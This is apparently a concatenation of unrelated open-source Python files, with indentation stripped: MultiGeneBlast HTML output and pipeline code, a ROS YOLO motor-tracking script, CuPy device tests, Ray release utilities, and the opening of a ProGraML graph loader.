htmloutfile.write(hitclustergenesdetails[j][4])
else:
htmloutfile.write(j)
htmloutfile.write("</div>\n\n")
a += 1
htmloutfile.write('</div>\n')
#Find new relative positions for display of all gene clusters in one picture
relpositiondata = clusterblastpositiondata[str(page) + "_all"]
if len(relpositiondata[0]) > 0:
qrel_starts = relpositiondata[0][0]
qrel_ends = relpositiondata[0][1]
htmloutfile.write('<div id="hitcluster' + str(page) + '_all" style="display:none">\n')
#Load svg and embed it into XHTML
svglines = open("svg" + os.sep + "clusterblast" + str(qclusternr) + "_all.svg","r").read().split("\n")
htmloutfile.write("\n" + svglines[0][:-1] + 'id="svg' + str(qclusternr) + '_all" >' + "\n")
for svgline in svglines[1:]:
htmloutfile.write(svgline + "\n")
if len(nucname) < 90:
qdescription = "Query: " + nucname
else:
qdescription = "Query: " + nucname[0:87] + "..."
htmloutfile.write('<div id="descriptionquery" style="text-align:left; position:absolute; top:60px; left:10px; font-size:10px; font-style:italic">' + qdescription + '</div>\n')
for i in range(nrhitclusters):
frame_update()
hitclusterdata = queryclusterdata[1][1]
queryclustergenes = hitclusterdata[hitclusterdata.keys()[0]][3]
queryclustergenesdetails = hitclusterdata[hitclusterdata.keys()[0]][4]
hitclusternumber = i + 1 + (page - 1) * 50
hrel_starts = relpositiondata[1][hitclusternumber][0]
hrel_ends = relpositiondata[1][hitclusternumber][1]
cluster_acc = hitclusterdata[hitclusternumber][6]
cluster_blastdetails = blastdetails[cluster_acc]
mgbscore = mgb_scores[cluster_acc][0]
cumblastscore = mgb_scores[cluster_acc][1]
hitclustergenes = clusters[cluster_acc][0]
hitclustergenesdetails = hitclusterdata[hitclusternumber][2]
strandsbalance = relpositiondata[2][hitclusternumber]
hstarts = relpositiondata[3][hitclusternumber][0]
hends = relpositiondata[3][hitclusternumber][1]
invertedhstarts = [str(100000000 - int(l)) for l in hstarts]
invertedhends = [str(100000000 - int(l)) for l in hends]
cgbkdescription = hitclusterdata[i + 1 + (page - 1) * 50][5][i].replace("&","&amp;").replace("\t"," ").partition(" ")[2].partition(" ")[2].split(", whole")[0].split(", complete")[0].split(", partial")[0]
if len(cgbkdescription) > 90:
cgbkdescription = cgbkdescription[:87] + "..."
if testaccession(cluster_acc.rpartition("_")[0]) == "y":
cdescription = str(i+1 + (page - 1) * 50) + ". : " + '<a href="http://www.ncbi.nlm.nih.gov/nuccore/' + cluster_acc.rpartition("_")[0] + '" target="_blank"> ' + cluster_acc.rpartition("_")[0] + "</a> " + cgbkdescription + " Total score: " + mgbscore + " Cumulative Blast bit score: " + cumblastscore
else:
cdescription = str(i+1 + (page - 1) * 50) + ". : " + cluster_acc.rpartition("_")[0] + " " + cgbkdescription + " Total score: " + mgbscore + " Cumulative Blast bit score: " + cumblastscore
htmloutfile.write('<div id="description' + str(qclusternr) + '" style="text-align:left; position:absolute; top:' + str(int(63 + (51.7 * (hitclusternumber - (page - 1) * 50)))) + 'px; left:10px; font-size:10px; font-style:italic">' + cdescription + '</div>\n')
if hitclusternumber == 1 + (page - 1) * 50:
a = 0
for j in queryclustergenes:
htmloutfile.write('<div id="all_' + str(qclusternr) + "_0_" + str(a) + '_div" class="hidden popup" style="position:absolute; top:' + str(100) + 'px; left:' + str(int(float(qrel_starts[a])*0.875)) + 'px; z-index:2;">\n')
htmloutfile.write(queryclustergenesdetails[j][3].replace("_"," ").replace("&","&amp;") + "\n")
link = "http://blast.ncbi.nlm.nih.gov/Blast.cgi?PAGE=Proteins&PROGRAM=blastp&BLAST_PROGRAMS=blastp&QUERY=" + j + "&LINK_LOC=protein&PAGE_TYPE=BlastSearch"
if j != queryclustergenesdetails[j][4] and testaccession(j) == "y":
htmloutfile.write('<br/>Accession: <a href="http://www.ncbi.nlm.nih.gov/protein/' + j + '" target="_blank">' + j + "</a>\n")
htmloutfile.write("<br/>Location: " + str(queryclustergenesdetails[j][0]) + "-" + str(queryclustergenesdetails[j][1]) + "\n")
if testaccession(j) == "y":
htmloutfile.write("<br/><a href=\"" + link + "\" target=\"_blank\"> NCBI BlastP on this gene </a>\n")
if colorschemedict.has_key(j) and colorschemedict[j] in musclegroups:
htmloutfile.write("<br/><a href=\"fasta" + os.sep + "orthogroup" + str(colorschemedict[j]) + "_muscle.fasta\" target=\"_blank\"> Muscle alignment of this gene with homologs </a>\n")
htmloutfile.write("</div>\n\n")
htmloutfile.write('<div id="all_' + str(qclusternr) + "_0_" + str(a) + '_divtext" class="hidden genenames" style="position:absolute; top:' + str(75) + 'px; left:' + str(int(float((float(qrel_starts[a])+float(qrel_ends[a]))/2)*0.9375)) + 'px;">\n')
if queryclustergenesdetails[j][4] != "" and queryclustergenesdetails[j][4] != "no_locus_tag":
htmloutfile.write(queryclustergenesdetails[j][4])
else:
htmloutfile.write(j)
htmloutfile.write("</div>\n\n")
a+= 1
a = 0
for j in hitclustergenes:
if ((hitclustergenesdetails[j][0] in hstarts or hitclustergenesdetails[j][0] in hends) and (hitclustergenesdetails[j][1] in hends or hitclustergenesdetails[j][1] in hstarts)) or ((hitclustergenesdetails[j][1] in invertedhstarts or hitclustergenesdetails[j][1] in invertedhends) and (hitclustergenesdetails[j][0] in invertedhends or hitclustergenesdetails[j][0] in invertedhstarts)):
htmloutfile.write('<div id="all_' + str(qclusternr) + "_" + str(hitclusternumber) + "_" + str(a) + '_div" class="hidden popup" style="position:absolute; top:' + str(int(100 + 51.7 * (hitclusternumber - (page - 1) * 50))) + 'px; left:' + str(int(float(hrel_starts[a])*0.875)) + 'px; z-index:2;">\n')
htmloutfile.write(hitclustergenesdetails[j][3].replace("_"," ").replace("&","&amp;") + "\n")
link = "http://blast.ncbi.nlm.nih.gov/Blast.cgi?PAGE=Proteins&PROGRAM=blastp&BLAST_PROGRAMS=blastp&QUERY=" + j + "&LINK_LOC=protein&PAGE_TYPE=BlastSearch"
if dbtype == "nucl":
htmloutfile.write('<br/>Accession: <a href="http://www.ncbi.nlm.nih.gov/nuccore/' + j.rpartition("_")[2] + '" target="_blank">' + j.rpartition("_")[2] + "</a>\n")
elif j != hitclustergenesdetails[j][4] and testaccession(j) == "y":
htmloutfile.write('<br/>Accession: <a href="http://www.ncbi.nlm.nih.gov/protein/' + j + '" target="_blank">' + j + "</a>\n")
htmloutfile.write("<br/>Location: " + str(hitclustergenesdetails[j][0]) + "-" + str(hitclustergenesdetails[j][1]) + "\n")
if cluster_blastdetails.has_key(j):
for blasthit in cluster_blastdetails[j]:
htmloutfile.write("<br/><br/><b>BlastP hit with " + blasthit[0] + "</b>\n<br/>Percentage identity: " + blasthit[1] + " %\n")
htmloutfile.write("<br/>BlastP bit score: " + blasthit[2] + "\n<br/>Sequence coverage: " + blasthit[3].partition(".")[0] + " %\n")
htmloutfile.write("<br/>E-value: " + blasthit[4] + "\n<br/>")
if testaccession(j) == "y" and dbtype != "nucl":
htmloutfile.write("<br/><a href=\"" + link + "\" target=\"_blank\"> NCBI BlastP on this gene </a>\n")
if colorschemedict.has_key(j) and colorschemedict[j] in musclegroups:
htmloutfile.write("<br/><a href=\"fasta" + os.sep + "orthogroup" + str(colorschemedict[j]) + "_muscle.fasta\" target=\"_blank\"> Muscle alignment of this gene with homologs </a>\n")
htmloutfile.write("</div>\n\n")
htmloutfile.write('<div id="all_' + str(qclusternr) + "_" + str(hitclusternumber) + "_" + str(a) + '_divtext" class="hidden genenames" style="position:absolute; top:' + str(int(75 + 51.7 * (hitclusternumber - (page - 1) * 50))) + 'px; left:' + str(int(float((float(hrel_starts[a])+float(hrel_ends[a]))/2)*0.9375)) + 'px;">\n')
if hitclustergenesdetails[j][4] != "" and hitclustergenesdetails[j][4] != "no_locus_tag":
htmloutfile.write(hitclustergenesdetails[j][4])
else:
htmloutfile.write(j)
htmloutfile.write("</div>\n\n")
a += 1
htmloutfile.write('</div>\n')
htmloutfile.write('</div>\n\n')
else:
htmloutfile.write('<br/>No homologous gene clusters found.</div>\n')
htmloutfile.write('</div>\n')
htmloutfile.write('<div id="creditsbar' + str(i) + '" class="banner" style="position:absolute; width:' + str(int(0.98 * screenwidth)) +'px; align:\'left\'; height:75; top:2750px; left:0px; color:#000066; z-index:-1;">')
htmloutfile.write('<div style="float:center; font-size:0.9em;">\n<div style="position:absolute; top:0px; left:30px;">\n<img src="images/ruglogo.gif" border="0"/> \n<img src="images/gbblogo.gif" border="0"/> \n</div>\n<div style="position:absolute; top:10px; left:340px;">\nDetecting sequence homology at the gene cluster level with MultiGeneBlast.\n<br/>Marnix H. Medema, Rainer Breitling & Eriko Takano (2013)\n<br/><i>Molecular Biology and Evolution</i> , 30: 1218-1223.\n</div>\n</div>\n</div>')
def finalize_xhtml(htmloutfile, htmlparts):
#Add final part of HTML file
htmloutfile.write(htmlparts[-1])
#Copy accessory files for HTML viewing
#if sys.platform == ('win32'):
# copycommand1 = "copy/y vis\\* " + genomename + " > nul"
# copycommand2 = "copy/y vis\\html\\* " + genomename + "\\html > nul"
# copycommand3 = "copy/y vis\\images\\* " + genomename + "\\images > nul"
#elif sys.platform == ('linux2'):
# copycommand1 = "cp vis/* " + genomename + " > /dev/null"
# copycommand2 = "cp -r vis/html " + genomename + "/html > /dev/null"
# copycommand3 = "cp -r vis/images " + genomename + "/images > /dev/null"
#os.system(copycommand1)
#os.system(copycommand2)
#os.system(copycommand3)
#Close open html file
htmloutfile.close()
def create_xhtml_file(queryclusterdata, clusters, clusterblastpositiondata, nucname, page, pages, screenwidth, blastdetails, mgb_scores, musclegroups, colorschemedict, dbtype):
htmloutfile, htmlparts = create_xhtml_template(queryclusterdata, page, pages)
write_xhtml_output(htmloutfile, queryclusterdata, clusters, clusterblastpositiondata, nucname, page, screenwidth, blastdetails, mgb_scores, musclegroups, colorschemedict, dbtype)
finalize_xhtml(htmloutfile, htmlparts)
def move_outputfiles(foldername, pages):
global MGBPATH
#Move output files to specified output folder. Overwriting when files/folders are already present there
try:
os.mkdir(foldername)
except:
pass
try:
shutil.rmtree(foldername + os.sep + "svg")
except:
pass
try:
shutil.rmtree(foldername + os.sep + "fasta")
except:
pass
for page in range(pages):
try:
os.remove(foldername + os.sep + dbname + "displaypage" + str(page + 1) + ".xhtml")
except:
pass
try:
shutil.move(dbname + "displaypage" + str(page + 1) + ".xhtml", foldername + os.sep + dbname + "displaypage" + str(page + 1) + ".xhtml")
except:
pass
filestomove = [dbname + "clusterblast_output.txt", "svg", "fasta"]
frame_update()
for f in filestomove:
try:
os.remove(foldername + os.sep + f)
except:
try:
shutil.rmtree(foldername + os.sep + f)
except:
pass
try:
shutil.move(f, foldername + os.sep + f)
except:
pass
frame_update()
filestocopy = ["style.css", "jquery.svg.js", "jquery-1.4.2.min.js", "jquery.svgdom.js"]
for f in filestocopy:
try:
os.remove(foldername + os.sep + f)
except:
pass
shutil.copy(MGBPATH + os.sep + f, foldername + os.sep + f)
folderstocopy = ["images"]
for f in folderstocopy:
try:
shutil.rmtree(foldername + os.sep + f)
except:
pass
shutil.copytree(MGBPATH + os.sep + f, foldername + os.sep + f)
def main():
global GUI
global TEMP
global MGBPATH
os.environ['BLASTDB'] = MGBPATH
os.chdir(TEMP)
GUI = "n"
starttime = time.time()
opts = Options()
#Step 1: parse options
parse_options(sys.argv, opts)
global dbname
dbname = opts.db
print "Step 1/11: Time since start: " + str((time.time() - starttime))
#Step 2: Read GBK / EMBL file, select genes from requested region and output FASTA file
proteins, genomic_accnr, dnaseqlength, nucname, querytags, names, seqs, seqdict, arch_search = read_input_file(opts.infile, opts.startpos, opts.endpos, opts.ingenes, opts.gui)
print "Step 2/11: Time since start: " + str((time.time() - starttime))
#Step 3: Run internal BLAST
internalhomologygroupsdict, seqlengths = internal_blast(opts.minseqcov, opts.minpercid, names, proteins, seqdict, opts.nrcpus)
print "Step 3/11: Time since start: " + str((time.time() - starttime))
#Step 4: Run BLAST on genbank_mf database
blastoutput = db_blast(names, seqs, opts.db, opts.nrcpus, opts.hitspergene, opts.dbtype)
print "Step 4/11: Time since start: " + str((time.time() - starttime))
#Step 5: Parse BLAST output
blastdict, querylist = parse_blast(blastoutput, opts.minseqcov, opts.minpercid, seqlengths, seqdict, opts.db, opts.dbtype)
print "Step 5/11: Time since start: " + str((time.time() - starttime))
#Step 6: Load genomic databases into memory
nucdescriptions, nucdict, proteininfo = load_databases(querylist, blastdict, opts.nrcpus, opts.db, opts.dbtype)
print "Step 6/11: Time since start: " + str((time.time() - starttime))
#Step 7: Locate Blast hits in genomes
blastdict, geneposdict, hitclusters, clusters, multiplehitlist = find_genomic_loci(blastdict, nucdict, proteininfo, opts.distancekb, querylist, nucdescriptions, dnaseqlength)
print "Step 7/11: Time since start: " + str((time.time() - starttime))
#Step 8: Score Blast output on all loci
opts.pages = score_blast_output(hitclusters, querylist, blastdict, multiplehitlist, proteins, proteininfo, querytags, opts.infile, clusters, nucdescriptions, opts.pages, arch_search, opts.syntenyweight)
print "Step 8/11: Time since start: " + str((time.time() - starttime))
#Output. From here, iterate for every page
for page in [pagenr + 1 for pagenr in range(opts.pages)]:
#Step 9: Write MultiGeneBlast SVGs
queryclusterdata, colorschemedict, clusterblastpositiondata, blastdetails, mgb_scores = write_svgs(page, opts.screenwidth, internalhomologygroupsdict, arch_search)
print "Step 9/11, page " + str(page) + ": Time since start: " + str((time.time() - starttime))
#Step 10: Create muscle alignments
musclegroups = align_muscle(opts.muscle, colorschemedict, seqdict)
print "Step 10/11, page " + str(page) + ": Time since start: " + str((time.time() - starttime))
#Step 11: Create XHTML output file
create_xhtml_file(queryclusterdata, clusters, clusterblastpositiondata, nucname, page, opts.pages, opts.screenwidth, blastdetails, mgb_scores, musclegroups, colorschemedict, opts.dbtype)
print "Step 11/11, page " + str(page) + ": Time since start: " + str((time.time() - starttime))
#Move all files to specified output folder
move_outputfiles(opts.outputfolder, opts.pages)
#Close log file
print "MultiGeneBlast successfully finished in " + str((time.time() - starttime)) + " seconds.\n"
if __name__ == '__main__':
freeze_support()
main()
|
detect_motor_test3.py
|
#!/usr/bin/env python
#!coding=utf-8
import rospy
import numpy as np
import PIL.Image as pilimage
from sensor_msgs.msg import CompressedImage
from sensor_msgs.msg import Image
from std_msgs.msg import Float64
from cv_bridge import CvBridge, CvBridgeError
import cv2
import time
from yolo import YOLO
from sensor_msgs.msg import Joy
from std_msgs.msg import String
from geometry_msgs.msg import Twist
from tf.transformations import *
from math import pi
from geometry_msgs.msg import PoseStamped
from std_msgs.msg import Header
from sensor_msgs.msg import JointState
from threading import Thread
import threading
RV2_motor1_joint = 0.0 # default until the first /joint_states_motor message arrives
yolo = YOLO()
bridge = CvBridge()
def send():
rospy.Subscriber('/mid_camera/color/image_raw/compressed', CompressedImage, ReceiveVideo_right)
rospy.spin()
def ReceiveVideo_right(data):
global cv_image
# print(1)
cv_image = bridge.compressed_imgmsg_to_cv2(data, 'bgr8')
def main():
global delta_x,cv_image
time.sleep(4)
fps = 0
while not rospy.is_shutdown():
t1 = time.time()
# Read the current frame
frame = cv2.cvtColor(cv_image,cv2.COLOR_BGR2RGB)
# Convert it to a PIL Image
frame = pilimage.fromarray(np.uint8(frame))
# Run detection
frame, bbox_list, label_list = yolo.detect_image(frame)
frame = np.array(frame)
# Convert RGB back to BGR for OpenCV display
frame = cv2.cvtColor(frame,cv2.COLOR_RGB2BGR)
fps = ( fps + (1./(time.time()-t1)) ) / 2
print("fps= %.2f"%(fps))
frame = cv2.putText(frame, "fps= %.2f"%(fps), (0, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)
print(frame.shape)
cv2.imshow("video",frame)
cv2.waitKey(3)
# c= cv2.waitKey(1) & 0xff
# if c==27:
# break
if type(label_list) != int: # bbox_list and label_list are 1 when no object was detected
num_of_obj = len(label_list)
#print('num_of_object:', num_of_obj)
#Determine the offset between the tracked object and the image centre
for i in range(num_of_obj):
if 'banana' in label_list[i]:
object_center = (bbox_list[i][1]+bbox_list[i][3])*0.5
delta_x = 320-object_center
#print(delta_x)
#return delta_x
# location_pub.publish(delta_x)
#motor1_move()
elif 'bed' in label_list[i]:
print("yyy")
pass
else:
print('YOLO did not detect any object')
pass
def motor1_move():
time.sleep(1)
global command_vel_pub_m, delta_x, RV2_motor1_joint
delta_x = 0
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
# rospy.Subscriber('/joint_states_motor',JointState,RV2_motorjointstate_callback)
while not rospy.is_shutdown():
print(delta_x)
#Middle position range
if -1.5 < RV2_motor1_joint < 1.5:
#Turn-left condition
if delta_x > 200:
motor_vel.velocity = [0.48]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
elif 80 < delta_x < 200:
motor_vel.velocity = [(delta_x - 40) * 0.003]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
#Turn-right condition
elif delta_x < -200:
motor_vel.velocity = [-0.48]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
elif -200 < delta_x < -80:
motor_vel.velocity = [(delta_x + 40) * 0.003]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
#Stop condition
elif -80 < delta_x < 80:
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
#Left limit range
if 1.5 < RV2_motor1_joint:
#Turn-left condition
if delta_x > 80:
motor_vel.velocity = [0]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
#Turn-right condition
elif delta_x < -200:
motor_vel.velocity = [-0.48]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
elif -200 < delta_x < -80:
motor_vel.velocity = [(delta_x + 40) * 0.003]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
#Stop condition
elif -80 < delta_x < 80:
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
time.sleep(0.5)
#Right limit range
if RV2_motor1_joint < -1.5:
#Turn-left condition
if delta_x > 200:
motor_vel.velocity = [0.48]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
elif 80 < delta_x < 200:
motor_vel.velocity = [(delta_x - 40) * 0.003]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
#Turn-right condition
elif delta_x < -80:
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
#Stop condition
elif -80 < delta_x < 80:
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
time.sleep(0.5)
else:
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
time.sleep(0.5)
#for object in vision_database_dict:
# Then convert the OpenCV-format data to a ROS Image message and publish it
# try:
# #self.image_pub.publish(self.bridge.cv2_to_imgmsg(cv_image, "bgr8"))
# location_pub.publish(location_pub)
# except CvBridgeError as e:
# print('e')
def RV2_motorjointstate_callback(data):
# Store the RV2 motor joint position in a global variable
global RV2_motor1_joint
RV2_motor1_joint = data.position[0]
print(RV2_motor1_joint)
if __name__ == '__main__':
# Initialize the ROS node
rospy.init_node("cv_bridge_test")
rospy.loginfo("Starting cv_bridge_test node")
global command_vel_pub_m, delta_x
#Create the velocity publisher
command_vel_pub_m = rospy.Publisher('/motor_control/input/velocity', JointState, queue_size = 100, latch=True)
#Subscribe to the torso motor joint state
rospy.Subscriber('/joint_states_motor',JointState,RV2_motorjointstate_callback)
#Start the YOLO detection thread
t_send = threading.Thread(target = send)
t_send.start()
t_main = threading.Thread(target=main)
t_main.start()
#time.sleep(2)
# Start the torso motion thread
t_motor1 = threading.Thread(target = motor1_move)
t_motor1.start()
rospy.spin()
# except KeyboardInterrupt:
# print("Shutting down cv_bridge_test node.")
# cv2.destroyAllWindows()
|
test_device.py
|
import re
import threading
import unittest
import pytest
import cupy
from cupy import cuda
from cupy.cuda import runtime
from cupy import testing
class TestDeviceComparison(unittest.TestCase):
def check_eq(self, result, obj1, obj2):
if result:
assert obj1 == obj2
assert obj2 == obj1
assert not (obj1 != obj2)
assert not (obj2 != obj1)
else:
assert obj1 != obj2
assert obj2 != obj1
assert not (obj1 == obj2)
assert not (obj2 == obj1)
def test_equality(self):
self.check_eq(True, cuda.Device(0), cuda.Device(0))
self.check_eq(True, cuda.Device(1), cuda.Device(1))
self.check_eq(False, cuda.Device(0), cuda.Device(1))
self.check_eq(False, cuda.Device(0), 0)
self.check_eq(False, cuda.Device(0), None)
self.check_eq(False, cuda.Device(0), object())
def test_lt_device(self):
assert cuda.Device(0) < cuda.Device(1)
assert not (cuda.Device(0) < cuda.Device(0))
assert not (cuda.Device(1) < cuda.Device(0))
def test_le_device(self):
assert cuda.Device(0) <= cuda.Device(1)
assert cuda.Device(0) <= cuda.Device(0)
assert not (cuda.Device(1) <= cuda.Device(0))
def test_gt_device(self):
assert not (cuda.Device(0) > cuda.Device(0))
assert not (cuda.Device(0) > cuda.Device(1))
assert cuda.Device(1) > cuda.Device(0)
def test_ge_device(self):
assert not (cuda.Device(0) >= cuda.Device(1))
assert cuda.Device(0) >= cuda.Device(0)
assert cuda.Device(1) >= cuda.Device(0)
def check_comparison_other_type(self, obj1, obj2):
with pytest.raises(TypeError):
obj1 < obj2
with pytest.raises(TypeError):
obj1 <= obj2
with pytest.raises(TypeError):
obj1 > obj2
with pytest.raises(TypeError):
obj1 >= obj2
with pytest.raises(TypeError):
obj2 < obj1
with pytest.raises(TypeError):
obj2 <= obj1
with pytest.raises(TypeError):
obj2 > obj1
with pytest.raises(TypeError):
obj2 >= obj1
def test_comparison_other_type(self):
self.check_comparison_other_type(cuda.Device(0), 0)
self.check_comparison_other_type(cuda.Device(0), 1)
self.check_comparison_other_type(cuda.Device(1), 0)
self.check_comparison_other_type(cuda.Device(1), None)
self.check_comparison_other_type(cuda.Device(1), object())
@testing.gpu
class TestDeviceAttributes(unittest.TestCase):
def test_device_attributes(self):
d = cuda.Device()
attributes = d.attributes
assert isinstance(attributes, dict)
assert all(isinstance(a, int) for a in attributes.values())
# test a specific attribute that would be present on any supported GPU
assert 'MaxThreadsPerBlock' in attributes
def test_device_attributes_error(self):
with pytest.raises(cuda.runtime.CUDARuntimeError):
# try to retrieve attributes from a non-existent device
cuda.device.Device(cuda.runtime.getDeviceCount()).attributes
@testing.gpu
class TestDevicePCIBusId(unittest.TestCase):
def test_device_get_pci_bus_id(self):
d = cuda.Device()
pci_bus_id = d.pci_bus_id
assert re.match(
'^[a-fA-F0-9]{4}:[a-fA-F0-9]{2}:[a-fA-F0-9]{2}.[a-fA-F0-9]',
pci_bus_id
)
def test_device_by_pci_bus_id(self):
d1 = cuda.Device()
d2 = cuda.Device.from_pci_bus_id(d1.pci_bus_id)
assert d1 == d2
d3 = cuda.Device(d2)
assert d2 == d3
with pytest.raises(cuda.runtime.CUDARuntimeError) as excinfo:
cuda.Device.from_pci_bus_id('fake:id')
assert str(excinfo.value) == 'cudaErrorInvalidValue: invalid argument'
with pytest.raises(cuda.runtime.CUDARuntimeError) as excinfo:
cuda.Device.from_pci_bus_id('FFFF:FF:FF.F')
assert str(excinfo.value) == 'cudaErrorInvalidDevice: invalid device ordinal'
@testing.gpu
class TestDeviceHandles(unittest.TestCase):
def _check_handle(self, func):
handles = [func(), None, None]
def _subthread():
handles[1] = func()
handles[2] = func()
t = threading.Thread(target=_subthread)
t.start()
t.join()
assert handles[0] is not None
assert handles[0] != handles[1]
assert handles[1] == handles[2]
def test_cublas_handle(self):
self._check_handle(cuda.get_cublas_handle)
def test_cusolver_handle(self):
self._check_handle(cuda.device.get_cusolver_handle)
def test_cusolver_sp_handle(self):
self._check_handle(cuda.device.get_cusolver_sp_handle)
@pytest.mark.xfail(
runtime.is_hip, reason='ROCm/HIP sparse support is not yet ready')
def test_cusparse_handle(self):
self._check_handle(cuda.device.get_cusparse_handle)
class TestDeviceFromPointer(unittest.TestCase):
def test_from_pointer(self):
assert cuda.device.from_pointer(cupy.empty(1).data.ptr).id == 0
|
util.py
|
import collections
import hashlib
import json
import os
import subprocess
import threading
import time
from typing import Callable, Dict, Any
import requests
from anyscale.sdk.anyscale_client.sdk import AnyscaleSDK
from ray_release.logger import logger
ANYSCALE_HOST = os.environ.get("ANYSCALE_HOST", "https://console.anyscale.com")
def deep_update(d, u):
for k, v in u.items():
if isinstance(v, collections.abc.Mapping):
d[k] = deep_update(d.get(k, {}), v)
else:
d[k] = v
return d
def dict_hash(dt: Dict[Any, Any]) -> str:
json_str = json.dumps(dt, sort_keys=True, ensure_ascii=True)
sha = hashlib.sha256()
sha.update(json_str.encode())
return sha.hexdigest()
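# --- Hedged usage sketch (added for illustration; not part of the original module) ---
# Shows how deep_update and dict_hash above can be combined to fingerprint a merged
# configuration; the dictionaries below are made-up examples.
def _example_config_fingerprint() -> str:
    base = {"cluster": {"cpus": 4, "region": "us-west-2"}}
    override = {"cluster": {"cpus": 8}}
    # deep_update merges nested mappings instead of replacing them wholesale.
    merged = deep_update(deep_update({}, base), override)
    # Identical contents always produce the same digest because dict_hash
    # serializes with sort_keys=True before hashing.
    return dict_hash(merged)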
def url_exists(url: str):
return requests.head(url).status_code == 200
def format_link(link: str):
# Use ANSI escape code to allow link to be clickable
# https://buildkite.com/docs/pipelines/links-and-images
# -in-log-output
if os.environ.get("BUILDKITE_COMMIT"):
return "\033]1339;url='" + link + "'\a\n"
# Else, no buildkite:
return link
def anyscale_project_url(project_id: str):
return (
f"{ANYSCALE_HOST}"
f"/o/anyscale-internal/projects/{project_id}"
f"/?tab=session-list"
)
def anyscale_cluster_url(project_id: str, session_id: str):
return (
f"{ANYSCALE_HOST}"
f"/o/anyscale-internal/projects/{project_id}"
f"/clusters/{session_id}"
)
def anyscale_cluster_compute_url(compute_tpl_id: str):
return (
f"{ANYSCALE_HOST}"
f"/o/anyscale-internal/configurations/cluster-computes"
f"/{compute_tpl_id}"
)
def anyscale_cluster_env_build_url(build_id: str):
return (
f"{ANYSCALE_HOST}"
f"/o/anyscale-internal/configurations/app-config-details"
f"/{build_id}"
)
_anyscale_sdk = None
def get_anyscale_sdk() -> AnyscaleSDK:
global _anyscale_sdk
if _anyscale_sdk:
return _anyscale_sdk
_anyscale_sdk = AnyscaleSDK()
return _anyscale_sdk
# Todo: remove to get rid of threading
def run_with_timeout(
fn: Callable[[], None],
timeout: float,
status_fn: Callable[[float], None],
error_fn: Callable[[], None],
status_interval: float = 30.0,
*args,
**kwargs,
):
start_time = time.monotonic()
next_status = start_time + status_interval
stop_event = threading.Event()
thread = threading.Thread(target=fn, args=(stop_event,) + args, kwargs=kwargs)
thread.start()
while thread.is_alive() and time.monotonic() < start_time + timeout:
if time.monotonic() > next_status:
next_status += status_interval
status_fn(time.monotonic() - start_time)
time.sleep(1)
if thread.is_alive():
stop_event.set()
error_fn()
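# --- Hedged usage sketch (added for illustration) ---
# run_with_timeout passes a threading.Event as the first argument of fn; the
# callable is expected to stop cooperatively once that event is set.
def _example_run_with_timeout():
    def work(stop_event: threading.Event):
        while not stop_event.is_set():
            time.sleep(0.1)

    run_with_timeout(
        work,
        timeout=5.0,
        status_fn=lambda elapsed: logger.info(f"still running after {elapsed:.0f}s"),
        error_fn=lambda: logger.error("timed out"),
        status_interval=1.0,
    )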
def exponential_backoff_retry(f, retry_exceptions, initial_retry_delay_s, max_retries):
retry_cnt = 0
retry_delay_s = initial_retry_delay_s
while True:
try:
return f()
except retry_exceptions as e:
retry_cnt += 1
if retry_cnt > max_retries:
raise
logger.info(
f"Retry function call failed due to {e} "
f"in {retry_delay_s} seconds..."
)
time.sleep(retry_delay_s)
retry_delay_s *= 2
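# --- Hedged usage sketch (illustrative only; the URL below is a placeholder) ---
# exponential_backoff_retry retries a zero-argument callable on the given
# exception types, doubling the delay after each failed attempt.
def _example_fetch_with_retry() -> int:
    return exponential_backoff_retry(
        lambda: requests.get("https://example.com/health").status_code,
        retry_exceptions=(requests.exceptions.RequestException,),
        initial_retry_delay_s=1,
        max_retries=3,
    )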
def run_bash_script(bash_script: str):
subprocess.run(f"bash {bash_script}", shell=True, check=True)
|
graph_loader.py
|
# Copyright 2019-2020 the ProGraML authors.
#
# Contact Chris Cummins <chrisc.101@gmail.com>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Train a GGNN to estimate solutions for classic data flow problems.
This script reads ProGraML graphs and uses a GGNN to predict binary
classification targets for data flow problems.
"""
import pathlib
import random
import threading
from queue import Queue
from typing import Iterable
from typing import Tuple
from labm8.py import app
from labm8.py import humanize
from labm8.py import pbutil
from programl.graph.format.py import cdfg
from programl.models import base_graph_loader
from programl.proto import epoch_pb2
from programl.proto import program_graph_features_pb2
from programl.proto import program_graph_pb2
app.DEFINE_integer(
"max_graph_node_count",
60000,
"The maximum node count in a single graph. Graphs with greater than this "
"many nodes are ignored. Use this to prevent OOM errors when loading very "
"large graphs.",
)
FLAGS = app.FLAGS
class DataflowGraphLoader(base_graph_loader.BaseGraphLoader):
"""A graph loader for dataflow graphs and features."""
def __init__(
self,
path: pathlib.Path,
epoch_type: epoch_pb2.EpochType,
analysis: str,
seed: int = None,
min_graph_count: int = None,
max_graph_count: int = None,
data_flow_step_max: int = None,
logfile=None,
use_cdfg: bool = False,
require_inst2vec: bool = False,
max_queue_size: int = 512,
):
self.graph_path = path / epoch_pb2.EpochType.Name(epoch_type).lower()
if not self.graph_path.is_dir():
raise FileNotFoundError(str(self.graph_path))
self.labels_path = path / "labels" / analysis
if not self.labels_path.is_dir():
raise FileNotFoundError(str(self.labels_path))
# Configuration options.
